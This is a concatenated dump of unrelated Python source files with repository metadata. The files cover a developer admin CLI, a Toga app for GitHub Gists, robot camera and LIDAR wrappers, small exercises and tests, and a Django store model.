theta = np.arccos(self._readout_rotation_alpha)
# keep current norms
current_norm = np.mean(
[torch.norm(teacher.head.weight) for teacher in teachers]
)
rotated_weight_vectors = custom_functions.generate_rotated_vectors(
dimension=self._hidden_dimensions[0],
theta=theta,
normalisation=current_norm,
)
teacher_0_rotated_weight_tensor = torch.Tensor(
rotated_weight_vectors[0]
).reshape(teachers[0].head.weight.data.shape)
teacher_1_rotated_weight_tensor = torch.Tensor(
rotated_weight_vectors[1]
).reshape(teachers[1].head.weight.data.shape)
return teacher_0_rotated_weight_tensor, teacher_1_rotated_weight_tensor
| 35.413793
| 89
| 0.636806
| 5,979
| 0.970302
| 0
| 0
| 0
| 0
| 0
| 0
| 1,159
| 0.188088
|
5542014f27e11156c75907e597b9852418147144
| 7,176
|
py
|
Python
|
scripts/admin/admin.py
|
starmarek/organize-me
|
710e7acd86e887b7e4379fde18e1f375846ea59e
|
[
"MIT"
] | null | null | null |
scripts/admin/admin.py
|
starmarek/organize-me
|
710e7acd86e887b7e4379fde18e1f375846ea59e
|
[
"MIT"
] | null | null | null |
scripts/admin/admin.py
|
starmarek/organize-me
|
710e7acd86e887b7e4379fde18e1f375846ea59e
|
[
"MIT"
] | null | null | null |
import json
import logging
import os
import shlex
import subprocess
from pathlib import Path
from types import SimpleNamespace
import coloredlogs
import fire
from .adminFiles import (
DockerComposeFile,
DotenvFile,
GitlabCIFile,
JsonFile,
PackageJsonFile,
Pipfile,
RuntimeTxtFile,
YarnRCFile,
)
log = logging.getLogger("admin")
coloredlogs.install(level="DEBUG")
yarn_dir = ".yarn/releases/"
for file in os.listdir(".yarn/releases"):
if os.getenv("CORE_YARN_VER") in file:
yarn_executable = file
virtualenv_path = subprocess.run(["pipenv", "--venv"], capture_output=True, text=True, check=True).stdout.strip()
dotenv_file = DotenvFile(path=".env")
compose_file = DockerComposeFile(path="docker-compose.yml")
dotenv_template_file = DotenvFile(path=".template.env")
gitlab_ci_file = GitlabCIFile(path=".gitlab-ci.yml")
yarnrc_file = YarnRCFile(path=".yarnrc.yml")
runtime_txt_file = RuntimeTxtFile(path="runtime.txt")
pipfile_file = Pipfile(path="Pipfile")
package_json_file = PackageJsonFile(path="package.json")
verifiable_files = [compose_file, gitlab_ci_file, pipfile_file, runtime_txt_file, package_json_file, yarnrc_file]
def _update_virtualenv_vscode_pythonpath():
settings_file = JsonFile(path=".vscode/settings.json")
Path(settings_file.path.split("/")[-2]).mkdir(exist_ok=True)
if Path(settings_file.path).exists():
settings_file["python.pythonPath"] = f"{virtualenv_path}/bin/python"
settings_file.dump()
else:
settings_file.data = json.loads(json.dumps({"python.pythonPath": f"{virtualenv_path}/bin/python"}))
settings_file.dump()
log.info(f"Setting vscode pythonpath to '{virtualenv_path}/bin/python'")
def _install_pre_commit():
log.info("Installing pre-commit hooks")
subprocess.run(shlex.split(f"{virtualenv_path}/bin/pre-commit install"), check=True)
log.warning("You need to install shfmt and shellcheck on your computer in order to pre-commit hooks to work.")
def _verify_dotenvs():
log.info("Verifying dotenvs compatibility")
assert all(val == dotenv_template_file[key] for key, val in dotenv_file.data.items() if key.startswith("CORE"))
def _verify_yarn_executable():
log.info("Verifying yarn compatibility")
assert any(os.getenv("CORE_YARN_VER") in yarn_executable for yarn_executable in os.listdir(".yarn/releases"))
def _verify_versions():
curr = dotenv_file
reference = dotenv_template_file
try:
_verify_dotenvs()
reference = dotenv_file
curr = SimpleNamespace(name="files in .yarn/releases dir")
_verify_yarn_executable()
log.info("Verifying compatibility of core versions")
for ver_file in verifiable_files:
curr = ver_file
assert ver_file.verify_core_versions()
except AssertionError:
log.error(
f"There is a mismatch between {curr.name} and {reference.name}! Make sure that you are using admin script to bump versions of packages!"
)
raise
class CLI:
def __init__(self, vscode=False):
try:
self.running_in_vscode = os.environ["TERM_PROGRAM"] == "vscode"
except KeyError:
self.running_in_vscode = False
if vscode:
self.running_in_vscode = True
def update_yarn(self, ver):
log.info("Upgrading yarn")
subprocess.run([yarn_dir + yarn_executable, "set", "version", ver], check=True)
dotenv_template_file["CORE_YARN_VER"] = ver
dotenv_file["CORE_YARN_VER"] = ver
dotenv_file.dump_to_env()
package_json_file["engines"]["yarn"] = ver
package_json_file.dump()
self.containers_ground_up(cache=False)
def update_postgres(self, ver):
dotenv_template_file["CORE_POSTGRES_VER"] = ver
dotenv_file["CORE_POSTGRES_VER"] = ver
dotenv_file.dump_to_env()
self.containers_ground_up(cache=False)
def update_compose(self, ver):
ver = str(ver)
dotenv_template_file["CORE_COMPOSE_VER"] = ver
dotenv_file["CORE_COMPOSE_VER"] = ver
dotenv_file.dump_to_env()
compose_file["version"] = ver
compose_file.dump()
self.containers_ground_up(cache=False)
def update_python(self, ver):
log.info("Reinstalling your pipenv")
subprocess.run(["pipenv", "--rm"], check=True)
pipfile_file["requires"]["python_version"] = ver
pipfile_file.dump()
subprocess.run(["pipenv", "update", "--keep-outdated", "--dev"], check=True)
dotenv_template_file["CORE_PYTHON_VER"] = ver
dotenv_file["CORE_PYTHON_VER"] = ver
dotenv_file.dump_to_env()
self.containers_ground_up(cache=False)
gitlab_ci_file["variables"]["PYTHON_VERSION"] = ver
gitlab_ci_file.dump()
runtime_txt_file.data = [f"python-{ver}"]
runtime_txt_file.dump()
if self.running_in_vscode:
_update_virtualenv_vscode_pythonpath()
def update_node(self, ver):
dotenv_template_file["CORE_NODE_VER"] = ver
dotenv_file["CORE_NODE_VER"] = ver
dotenv_file.dump_to_env()
self.containers_ground_up(cache=False)
gitlab_ci_file["variables"]["NODE_VERSION"] = ver
gitlab_ci_file.dump()
package_json_file["engines"]["node"] = ver
package_json_file.dump()
def containers_build(self, cache=True):
log.info(f"Building containers with 'cache={cache}'")
subprocess.run(shlex.split(f"docker-compose build --force-rm {'' if cache else '--no-cache'}"), check=True)
def containers_logs(self, container_name=""):
try:
subprocess.run(shlex.split(f"docker-compose logs -f {container_name}"))
except KeyboardInterrupt:
pass
def containers_up(self):
log.info("Running containers")
subprocess.run(shlex.split("docker-compose up --detach --remove-orphans --force-recreate"), check=True)
def containers_ground_up(self, cache=True):
self.containers_build(cache=cache)
self.containers_up()
def init(self):
self.containers_ground_up(cache=False)
_install_pre_commit()
if self.running_in_vscode:
_update_virtualenv_vscode_pythonpath()
def install_pip(self, package, dev=False):
subprocess.run(shlex.split(f"pipenv install {package} {'--dev' if dev else ''}"), check=True)
self.containers_ground_up(cache=False)
def install_yarn(self, package, dev=False):
subprocess.run(
shlex.split(f"sudo {yarn_dir + yarn_executable} add {package} {'--dev' if dev else ''}"), check=True
)
self.containers_ground_up(cache=False)
def remove_pip(self, package):
subprocess.run(["pipenv", "uninstall", package], check=True)
self.containers_ground_up(cache=False)
def remove_yarn(self, package):
subprocess.run(["sudo", yarn_dir + yarn_executable, "remove", package], check=True)
self.containers_ground_up(cache=False)
if __name__ == "__main__":
log.info("Starting admin script")
_verify_versions()
fire.Fire(CLI)
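# Usage sketch (added for illustration; exact invocation details are
# assumptions): python-fire exposes the CLI methods as subcommands, so typical
# calls look like
#   python scripts/admin/admin.py init
#   python scripts/admin/admin.py update_python 3.9
#   python scripts/admin/admin.py containers_logs web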
| 32.324324
| 148
| 0.67879
| 4,030
| 0.561594
| 0
| 0
| 0
| 0
| 0
| 0
| 1,708
| 0.238016
|
5542f0b7bef41dfe29c0868984e349d2a0c056ea
| 300
|
py
|
Python
|
F_Machine_learning/2_Unsupervised-Learning/solutions/ex2_3.py
|
sylvain2002/CBM101
|
4d9dc4264ce81cc2af58ceaff96fd0ed7a570af5
|
[
"MIT"
] | 7
|
2019-07-03T07:41:55.000Z
|
2022-02-06T20:25:37.000Z
|
F_Machine_learning/2_Unsupervised-Learning/solutions/ex2_3.py
|
sylvain2002/CBM101
|
4d9dc4264ce81cc2af58ceaff96fd0ed7a570af5
|
[
"MIT"
] | 9
|
2019-03-14T15:15:09.000Z
|
2019-08-01T14:18:21.000Z
|
F_Machine_learning/2_Unsupervised-Learning/solutions/ex2_3.py
|
sylvain2002/CBM101
|
4d9dc4264ce81cc2af58ceaff96fd0ed7a570af5
|
[
"MIT"
] | 11
|
2019-03-12T10:43:11.000Z
|
2021-10-05T12:15:00.000Z
|
a = 'ARRYR'
b = 'ARSYS'
levenshtein(a,b)
# ANSWER a)
# It quantifies the number of single-letter edits (insertions, deletions, substitutions) needed to morph one string into the other
#
# ANSWER b)
# We could encode the 'price' of changing between particular amino acids
# thereby acknowledging that some substitutions are more or less costly/likely
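# The exercise calls levenshtein() without defining it in this snippet; a
# minimal sketch of a standard dynamic-programming implementation (an
# assumption -- the notebook presumably provides its own version) would be:
def levenshtein(s, t):
    # dp[i][j] = edits needed to turn s[:i] into t[:j]
    dp = [[0] * (len(t) + 1) for _ in range(len(s) + 1)]
    for i in range(len(s) + 1):
        dp[i][0] = i
    for j in range(len(t) + 1):
        dp[0][j] = j
    for i in range(1, len(s) + 1):
        for j in range(1, len(t) + 1):
            cost = 0 if s[i - 1] == t[j - 1] else 1
            dp[i][j] = min(dp[i - 1][j] + 1,         # deletion
                           dp[i][j - 1] + 1,         # insertion
                           dp[i - 1][j - 1] + cost)  # substitution
    return dp[len(s)][len(t)]
# For the strings above, levenshtein('ARRYR', 'ARSYS') == 2 (two substitutions).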
| 27.272727
| 79
| 0.756667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 266
| 0.886667
|
5543d0392b1a991c4c0bc9b77494d93272ec2802
| 743
|
py
|
Python
|
tests/components/pages/ts.py
|
T4rk1n/dazzler
|
69c49422dc19c910445ab265b1d3481041de8f43
|
[
"MIT"
] | 15
|
2019-12-19T11:57:30.000Z
|
2021-11-15T23:34:41.000Z
|
tests/components/pages/ts.py
|
T4rk1n/dazzler
|
69c49422dc19c910445ab265b1d3481041de8f43
|
[
"MIT"
] | 196
|
2019-09-21T15:10:14.000Z
|
2022-03-31T11:07:48.000Z
|
tests/components/pages/ts.py
|
T4rk1n/dazzler
|
69c49422dc19c910445ab265b1d3481041de8f43
|
[
"MIT"
] | 7
|
2019-10-30T19:38:15.000Z
|
2021-12-01T04:54:16.000Z
|
from dazzler.system import Page
from dazzler.components import core
from tests.components import ts_components as tsc
page = Page(
__name__,
core.Container([
tsc.TypedComponent(
'override',
children=core.Container('foobar'),
num=2,
text='foobar',
boo=True,
arr=[1, 2, 'mixed'],
arr_str=['foo', 'bar'],
arr_num=[7, 8, 9],
arr_obj_lit=[{'name': 'foo'}],
obj={'anything': 'possible'},
enumeration='foo',
union=7,
style={'border': '1px solid rgb(0,0,255)'},
class_name='other'
),
tsc.TypedClassComponent('class based', children='clazz')
])
)
| 27.518519
| 64
| 0.51144
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 138
| 0.185734
|
55454283c60ef0107317118c446ed4395d8f58a5
| 4,464
|
py
|
Python
|
src/gistsgetter/app.py
|
pmfrank/gistsgetter
|
a19f59604ebf1cb13c641d25c4461b4347bba58a
|
[
"MIT"
] | null | null | null |
src/gistsgetter/app.py
|
pmfrank/gistsgetter
|
a19f59604ebf1cb13c641d25c4461b4347bba58a
|
[
"MIT"
] | null | null | null |
src/gistsgetter/app.py
|
pmfrank/gistsgetter
|
a19f59604ebf1cb13c641d25c4461b4347bba58a
|
[
"MIT"
] | null | null | null |
"""
An application dedicated to creating, editing, and deleting Gists in GitHub
"""
from __future__ import absolute_import
import toga
import pyperclip
from toga.style import Pack
from toga.style.pack import COLUMN, ROW
from .common.Search import search
from functools import partial
class GistsGetter(toga.App):
def startup(self):
"""
Construct and show the Toga application.
Usually, you would add your application to a main content box.
We then create a main window (with a name matching the app), and
show the main window.
"""
main_box = toga.Box(style=Pack(direction=COLUMN))
top_box = toga.Box(style=Pack(direction=ROW, padding=5, alignment='top'))
middle_box = toga.Box(style=Pack(direction=ROW,padding=5, alignment='center', flex=1))
button_box = toga.Box(style=Pack(padding=5, alignment='right'))
bottom_box = toga.Box(style=Pack(direction=ROW, padding=(5,5,20,5), alignment='bottom')) # Padding - Top, Right, Botom, Left
select_label = toga.Label('Search By', style=Pack(padding=5, alignment='center'))
self.select = toga.Selection(items=['UserID','GistID'])
self.select_input = toga.TextInput(style=Pack(padding=5, flex=1),placeholder='User or Gist ID')
# Line preserved for posterity; will be using helper functions to do the search with external functions
# select_button = toga.Button('Search',style=Pack(padding=5),on_press=partial(search,string = 'x'))
select_button = toga.Button('Search', style=Pack(padding=5), on_press=self.search_by)
self.results = toga.MultilineTextInput(style=Pack(padding=(0,5), flex=1),readonly = True)
copy_button = toga.Button('Copy to Clipboard', style=Pack(padding=5),on_press=self.copy_to_clipboard)
button_box.add(copy_button)
middle_box.add(self.results)
middle_box.add(button_box)
top_box.add(select_label)
top_box.add(self.select)
top_box.add(self.select_input)
top_box.add(select_button)
login_label = toga.Label('Username', style=Pack(padding=5, alignment='left'))
self.login_input = toga.TextInput(style=Pack(padding=5,alignment='left',flex=1))
pw_label = toga.Label('Password', style=Pack(padding=5, alignment='right'))
self.pw_input = toga.PasswordInput(style=Pack(padding=4,alignment='right',flex=1))
bottom_box.add(login_label)
bottom_box.add(self.login_input)
bottom_box.add(pw_label)
bottom_box.add(self.pw_input)
main_box.add(top_box)
main_box.add(middle_box)
main_box.add(bottom_box)
self.main_window = toga.MainWindow(title=self.formal_name, size=(640,480))
self.main_window.content = main_box
self.main_window.show()
def search_by(self, widget):
global results
if not self.select_input.value or not self.login_input.value or not self.pw_input.value:
self.results.value = 'All fields required'
return
if self.select.value == 'UserID':
self.results.value = 'Feature not implemented'
return
else:
global gist_id
gist_id = self.select_input.value
url = self.__get_token('https://api.github.com/gists{/gist_id}','{')
results = search(url, self.login_input.value,self.pw_input.value)
for filename in results:
print(results[filename])
self.results.value = results
def copy_to_clipboard(self, widget):
global results
for filename in results:
pyperclip.copy(results[filename])
def __get_token(self, string, delim):
tokens = string.split(delim)
url = tokens[0]
for token in tokens[1:]:
token = token[:-1]
if '/' in token : token = token[1:]
if token in globals():
if '=' in url:
url = url + globals()[token]
else:
url = url + '/' + globals()[token]
if ',' in token:
token = token[1:]
print(token)
multitokens = token.split(',')
for multitoken in multitokens:
if multitoken in globals():
url = url + '&' + multitoken + '=' + globals()[multitoken]
return url
def main():
return GistsGetter()
| 38.817391
| 132
| 0.622536
| 4,140
| 0.927419
| 0
| 0
| 0
| 0
| 0
| 0
| 827
| 0.18526
|
5549b2fc2c6d6a256c772a1fa6b1cb0ba16583fe
| 7,401
|
py
|
Python
|
src/qcar/src/qcar/q_essential.py
|
bchampp/scylla
|
6ec27877cc03c200a874cd0eb25a36c866471250
|
[
"MIT"
] | null | null | null |
src/qcar/src/qcar/q_essential.py
|
bchampp/scylla
|
6ec27877cc03c200a874cd0eb25a36c866471250
|
[
"MIT"
] | null | null | null |
src/qcar/src/qcar/q_essential.py
|
bchampp/scylla
|
6ec27877cc03c200a874cd0eb25a36c866471250
|
[
"MIT"
] | null | null | null |
from quanser.hardware import HIL, HILError, PWMMode
from quanser.multimedia import Video3D, VideoCapture, Video3DStreamType, MediaError, ImageFormat, ImageDataType
from quanser.devices import RPLIDAR, RangingMeasurements, RangingMeasurementMode, DeviceError, RangingDistance
from .q_misc import Utilities
import numpy as np
import pygame
import time
saturate = Utilities.saturate
# region: Cameras
class Camera3D():
def __init__(self, mode='RGB&DEPTH', frame_width_RGB=1920, frame_height_RGB=1080, frame_rate_RGB=30.0, frame_width_depth=1280, frame_height_depth=720, frame_rate_depth=15.0, device_id='0'):
'''This function configures the Intel Realsense RGB and depth cameras for use.
Outputs:
video3d - video3d object, you must call video3d.start_streaming() before your main loop
stream_RGB - stream object to be passed to the read method
image_buffer_RGB - buffer array that will be updated by the read method
stream_depth - stream object to be passed to the read method
image_buffer_depth - buffer array that will be updated by the read method'''
self.mode = mode
self.stream_index = 0
self.image_buffer_RGB = np.zeros((frame_height_RGB, frame_width_RGB, 3), dtype=np.uint8)
self.image_buffer_depth_px = np.zeros((frame_height_depth, frame_width_depth, 1), dtype=np.uint8)
self.image_buffer_depth_m = np.zeros((frame_height_depth, frame_width_depth, 1), dtype=np.float32)
try:
self.video3d = Video3D(device_id)
if mode == 'RGB':
self.stream_RGB = self.video3d.stream_open(Video3DStreamType.COLOR, self.stream_index, frame_rate_RGB, frame_width_RGB, frame_height_RGB, ImageFormat.ROW_MAJOR_INTERLEAVED_BGR, ImageDataType.UINT8)
elif mode == 'DEPTH':
self.stream_depth = self.video3d.stream_open(Video3DStreamType.DEPTH, self.stream_index, frame_rate_depth, frame_width_depth, frame_height_depth, ImageFormat.ROW_MAJOR_GREYSCALE, ImageDataType.UINT8)
else:
self.stream_RGB = self.video3d.stream_open(Video3DStreamType.COLOR, self.stream_index, frame_rate_RGB, frame_width_RGB, frame_height_RGB, ImageFormat.ROW_MAJOR_INTERLEAVED_BGR, ImageDataType.UINT8)
self.stream_depth = self.video3d.stream_open(Video3DStreamType.DEPTH, self.stream_index, frame_rate_depth, frame_width_depth, frame_height_depth, ImageFormat.ROW_MAJOR_GREYSCALE, ImageDataType.UINT8)
self.video3d.start_streaming()
except MediaError as me:
print(me.get_error_message())
def terminate(self):
'''This function terminates the RGB and depth video and stream objects correctly.
Inputs:
video3d - video object from the configure method
stream_RGB - RGB stream object from the configure method
stream_depth - depth stream object from the configure method '''
try:
self.video3d.stop_streaming()
if self.mode == 'RGB':
self.stream_RGB.close()
elif self.mode == 'DEPTH':
self.stream_depth.close()
else:
self.stream_RGB.close()
self.stream_depth.close()
self.video3d.close()
except MediaError as me:
print(me.get_error_message())
def read_RGB(self):
'''This function reads an image from the RGB camera for use.
Outputs:
timestamp - timestamp corresponding to the frame read '''
timestamp = -1
try:
frame = self.stream_RGB.get_frame()
while not frame:
frame = self.stream_RGB.get_frame()
frame.get_data(self.image_buffer_RGB)
timestamp = frame.get_timestamp()
frame.release()
except KeyboardInterrupt:
pass
except MediaError as me:
print(me.get_error_message())
finally:
return timestamp
def read_depth(self, dataMode='px'):
'''This function reads an image from the depth camera for use.
dataMode is 'px' for pixels or 'm' for meters. Use corresponding image buffer.
Outputs:
timestamp - timestamp corresponding to the frame read '''
timestamp = -1
try:
frame = self.stream_depth.get_frame()
while not frame:
frame = self.stream_depth.get_frame()
if dataMode == 'px':
frame.get_data(self.image_buffer_depth_px)
elif dataMode == 'm':
frame.get_meters(self.image_buffer_depth_m)
timestamp = frame.get_timestamp()
frame.release()
except KeyboardInterrupt:
pass
except MediaError as me:
print(me.get_error_message())
finally:
return timestamp
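# Usage sketch (added for illustration; not part of the original module).
# __init__ already calls video3d.start_streaming(), so a caller only needs to
# read frames and then terminate, e.g.:
#   cam = Camera3D(mode='RGB')
#   for _ in range(100):
#       timestamp = cam.read_RGB()      # fills cam.image_buffer_RGB
#       frame = cam.image_buffer_RGB
#   cam.terminate()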
class Camera2D():
def __init__(self, camera_id="0", frame_width=640, frame_height=480, frame_rate=30.0):
'''This function configures the 2D camera for use based on the camera_id provided.'''
self.url = "video://localhost:"+camera_id
self.image_data = np.zeros((frame_height, frame_width, 3), dtype=np.uint8)
try:
# self.capture = VideoCapture(self.url, frame_rate, frame_width, frame_height, ImageFormat.ROW_MAJOR_INTERLEAVED_BGR, ImageDataType.UINT8, self.image_data, None, 0)
self.capture = VideoCapture(self.url, frame_rate, frame_width, frame_height, ImageFormat.ROW_MAJOR_INTERLEAVED_BGR, ImageDataType.UINT8, None, 0)
self.capture.start()
except MediaError as me:
print(me.get_error_message())
def read(self):
'''This function reads a frame, updating the corresponding image buffer.'''
try:
# self.capture.read()
self.capture.read(self.image_data)
except MediaError as me:
print(me.get_error_message())
except KeyboardInterrupt:
print('User Interrupted')
def reset(self):
'''This function resets the 2D camera stream by stopping and starting the capture service.'''
try:
self.capture.stop()
self.capture.start()
except MediaError as me:
print(me.get_error_message())
def terminate(self):
'''This function terminates the 2D camera operation.'''
try:
self.capture.stop()
self.capture.close()
except MediaError as me:
print(me.get_error_message())
# endregion
# region: LIDAR
class LIDAR():
def __init__(self, num_measurements=720):
#
self.num_measurements = num_measurements
# self.measurements = [RangingMeasurement() for x in range(self.num_measurements)]
# self.measurements = RangingMeasurements(num_measurements)
self.measurements = RangingMeasurements(num_measurements)
self.distances = np.zeros((num_measurements,1), dtype=np.float64)
self.angles = np.zeros((num_measurements,1), dtype=np.float64)
# self.angles = np.linspace(0, 2*np.pi-(2*np.pi/num_measurements), num_measurements, dtype=np.float64)
self.lidar = RPLIDAR()
# self.maxDistance = 18.0
try:
self.lidar.open("serial-cpu://localhost:2?baud='115200',word='8',parity='none',stop='1',flow='none',dsr='on'", RangingDistance.LONG)
except DeviceError as de:
if de.error_code == -34:
pass
else:
print(de.get_error_message())
def terminate(self):
try:
self.lidar.close()
except DeviceError as de:
if de.error_code == -34:
pass
else:
print(de.get_error_message())
def read(self):
try:
self.lidar.read(RangingMeasurementMode.NORMAL, 0, 0, self.measurements)
self.distances = np.array(self.measurements.distance)
# self.distances = np.append( np.flip( self.distances[0:int(self.num_measurements/4)] ) ,
# np.flip( self.distances[int(self.num_measurements/4):]) )
# self.distances[self.distances > self.maxDistance] = self.maxDistance
# self.distances[self.distances > self.maxDistance] = 0
self.angles = np.array(self.measurements.heading)
except DeviceError as de:
if de.error_code == -34:
pass
else:
print(de.get_error_message())
# endregion
| 37.190955
| 211
| 0.740576
| 6,952
| 0.939333
| 0
| 0
| 0
| 0
| 0
| 0
| 2,384
| 0.322119
|
554a7b61e03b3173856a7a579bde9d2c36a7f575
| 1,689
|
py
|
Python
|
ex071.py
|
cristianoandrad/ExerciciosPythonCursoEmVideo
|
362603436b71c8ef8386d7a9ab3c5fed0b8d63f7
|
[
"MIT"
] | null | null | null |
ex071.py
|
cristianoandrad/ExerciciosPythonCursoEmVideo
|
362603436b71c8ef8386d7a9ab3c5fed0b8d63f7
|
[
"MIT"
] | null | null | null |
ex071.py
|
cristianoandrad/ExerciciosPythonCursoEmVideo
|
362603436b71c8ef8386d7a9ab3c5fed0b8d63f7
|
[
"MIT"
] | null | null | null |
'''Write a program that simulates an ATM. At the start, ask the user for the amount to be withdrawn (an integer), and the program will report how many bills of each denomination will be dispensed. NOTE:
assume the machine only holds bills of R$50, R$20, R$10 and R$1.'''
'''print('--' * 15)
print('{:^30}'.format('Banco CEV'))
print('--' * 15)
valor = int(input('Qual o valor que você quer sacar R$ '))
c50 = valor % 50
c20 = c50 % 20
c10 = c20 % 10
c1 = c10 % 1
b50 = valor - c50
b20 = valor - b50 - c20
b10 = valor - b50 - b20 - c10
b1 = valor - b50 - b20 - b10 - c1
print(f'Total de {b50/50:.0f} celulas de R$ 50,00')
print(f'Total de {b20/20:.0f} celulas de R$ 20,00')
print(f'Total de {b10/10:.0f} celulas de R$ 10,00')
print(f'Total de {b1/1:.0f} celulas de R$ 1,00')
print('--' * 15)
print('Volte sempre ao Banco CEV! Tenha um bom dia')'''
'''valor = int(input("informe o valor a ser sacado : "))
nota50 = valor // 50
valor %= 50
nota20 = valor // 20
valor %= 20
nota10 = valor // 10
valor %= 10
nota1 = valor // 1
print(f"notas de 50 = {nota50}")
print(f"notas de 20 = {nota20}")
print(f"notas de 10 = {nota10}")
print(f"notas de 1 = {nota1}")'''
print('--' * 15)
print('{:^30}'.format('Banco CEV'))
print('--' * 15)
valor = int(input('Qual o valor que você quer sacar R$ '))
total = valor
cel = 50
contCel = 0
while True:
if total >= cel:
total -= cel
contCel += 1
else:
print(f'O total de {contCel} cédulas de R$ {cel}.')
if cel == 50:
cel = 20
elif cel == 20:
cel = 10
elif cel == 10:
cel = 1
contCel = 0
if total == 0:
break
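# Worked example (added for illustration): withdrawing R$ 186 dispenses
# 3 x R$ 50, 1 x R$ 20, 1 x R$ 10 and 6 x R$ 1 (150 + 20 + 10 + 6 = 186).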
| 27.241935
| 227
| 0.587922
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,297
| 0.762941
|
554c5ff1d984eee7cf69842945a06a7b43f122ff
| 919
|
py
|
Python
|
common.py
|
hoostus/prime-harvesting
|
6606b94ea7859fbf217dbea4ace856e3fa4d154e
|
[
"BlueOak-1.0.0",
"Apache-2.0"
] | 23
|
2016-09-07T06:13:37.000Z
|
2022-02-17T23:49:03.000Z
|
common.py
|
hoostus/prime-harvesting
|
6606b94ea7859fbf217dbea4ace856e3fa4d154e
|
[
"BlueOak-1.0.0",
"Apache-2.0"
] | null | null | null |
common.py
|
hoostus/prime-harvesting
|
6606b94ea7859fbf217dbea4ace856e3fa4d154e
|
[
"BlueOak-1.0.0",
"Apache-2.0"
] | 12
|
2016-06-30T17:27:39.000Z
|
2021-12-12T07:54:27.000Z
|
import itertools
import math
import simulate
import harvesting
import plot
from decimal import setcontext, ExtendedContext
# Don't raise exception when we divide by zero
#setcontext(ExtendedContext)
#getcontext().prec = 5
def compare_prime_vs_rebalancing(series, years=30, title=''):
(r1, r2) = itertools.tee(series)
x = simulate.withdrawals(r1, years=years)
y = simulate.withdrawals(r2, years=years, harvesting=harvesting.N_60_RebalanceHarvesting)
s1 = [n.withdraw_r for n in x]
s2 = [n.withdraw_r for n in y]
ceiling = max(max(s1), max(s2))
if ceiling < 100000:
ceiling = int(math.ceil(ceiling / 10000) * 10000)
else:
ceiling = int(math.ceil(ceiling / 100000) * 100000)
plot.plot_two(s1, s2, s1_title='Prime Harvesting', s2_title='Annual Rebalancing',
y_lim=[0,ceiling],
x_label='Year of Retirement', title=title)
| 31.689655
| 93
| 0.677911
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 156
| 0.16975
|
554e5d74e0feb6600546ab4240369b860c3f874d
| 492
|
py
|
Python
|
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
|
chhschou/sandpit
|
d4a6760905b45b90455f10a5b50af3c5f743e445
|
[
"MIT"
] | null | null | null |
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
|
chhschou/sandpit
|
d4a6760905b45b90455f10a5b50af3c5f743e445
|
[
"MIT"
] | null | null | null |
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
|
chhschou/sandpit
|
d4a6760905b45b90455f10a5b50af3c5f743e445
|
[
"MIT"
] | null | null | null |
import random
import string
import hashlib
def make_salt():
return ''.join(random.choice(string.letters) for x in xrange(5))
# Implement the function valid_pw() that returns True if a user's password
# matches its hash. You will need to modify make_pw_hash.
def make_pw_hash_with_salt(name, pw, salt):
h = hashlib.sha256(name + pw + salt).hexdigest()
return '%s|%s' % (h, salt)
def make_pw_hash(name, pw):
s = make_salt()
return make_pw_hash_with_salt(name, pw, s)
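# A minimal sketch of the valid_pw() mentioned in the comment above, assuming
# the 'hash|salt' format produced by make_pw_hash_with_salt (illustrative only):
def valid_pw(name, pw, h):
    salt = h.split('|')[1]
    return h == make_pw_hash_with_salt(name, pw, salt)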
| 23.428571
| 74
| 0.707317
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 140
| 0.284553
|
554ef62e12daf1b4dd0a910c08086098d9a39602
| 769
|
py
|
Python
|
tests/hdx/scraper/test_utils.py
|
mcarans/hdx-python-scraper
|
ce17c672591979d4601bd125a38b86ea81a9f3c4
|
[
"MIT"
] | null | null | null |
tests/hdx/scraper/test_utils.py
|
mcarans/hdx-python-scraper
|
ce17c672591979d4601bd125a38b86ea81a9f3c4
|
[
"MIT"
] | null | null | null |
tests/hdx/scraper/test_utils.py
|
mcarans/hdx-python-scraper
|
ce17c672591979d4601bd125a38b86ea81a9f3c4
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from hdx.data.dataset import Dataset
from hdx.scraper.utilities import (
get_isodate_from_dataset_date,
string_params_to_dict,
)
class TestUtils:
def test_string_params_to_dict(self):
result = string_params_to_dict("a: 123, b: 345")
assert result == {"a": "123", "b": "345"}
result = string_params_to_dict("a:123,b:345")
assert result == {"a": "123", "b": "345"}
def test_get_isodate_from_dataset_date(self, configuration):
dataset = Dataset(
{
"dataset_date": "[2022-01-11T02:24:08.241 TO 2022-01-11T02:24:08.241]"
}
)
result = get_isodate_from_dataset_date(dataset, datetime.now())
assert result == "2022-01-11"
| 29.576923
| 86
| 0.629389
| 597
| 0.776333
| 0
| 0
| 0
| 0
| 0
| 0
| 141
| 0.183355
|
554fb560fa2735d2073c8f53fb708577f43575e0
| 3,796
|
py
|
Python
|
store/models.py
|
Dokeey/Buy-Sell
|
9d70eb8649d79962657cc4be896e437908de537b
|
[
"MIT"
] | 7
|
2019-03-25T14:43:41.000Z
|
2021-09-16T01:44:41.000Z
|
store/models.py
|
Dokeey/Buy-Sell
|
9d70eb8649d79962657cc4be896e437908de537b
|
[
"MIT"
] | 80
|
2019-03-25T09:25:00.000Z
|
2020-02-09T01:01:09.000Z
|
store/models.py
|
Dokeey/Buy-Sell
|
9d70eb8649d79962657cc4be896e437908de537b
|
[
"MIT"
] | 4
|
2019-03-25T13:58:07.000Z
|
2021-11-26T09:12:32.000Z
|
from random import randrange
from django.conf import settings
from django.contrib.contenttypes.fields import GenericRelation
from django.db import models
from hitcount.models import HitCountMixin, HitCount
from imagekit.models import ProcessedImageField
from pilkit.processors import ResizeToFill
from django_cleanup import cleanup
from store.fields import DefaultStaticProcessedImageField
def get_random():
rand = randrange(1,10)
return '/static/profile/{}.png'.format(rand)
# @cleanup.ignore
class StoreProfile(models.Model, HitCountMixin):
user = models.OneToOneField(settings.AUTH_USER_MODEL, verbose_name="유저", on_delete=models.CASCADE)
name = models.CharField(max_length=20, verbose_name="가게명", unique=True)
photo = DefaultStaticProcessedImageField(
verbose_name="가게 사진",
null=True,
upload_to='profile/storephoto',
processors=[ResizeToFill(200, 200)],
format='JPEG',
options={'quality': 60}
)
comment = models.TextField(max_length=200, blank=True, verbose_name="소개", default="반갑습니다.")
created_at = models.DateTimeField(verbose_name="생성일", auto_now_add=True)
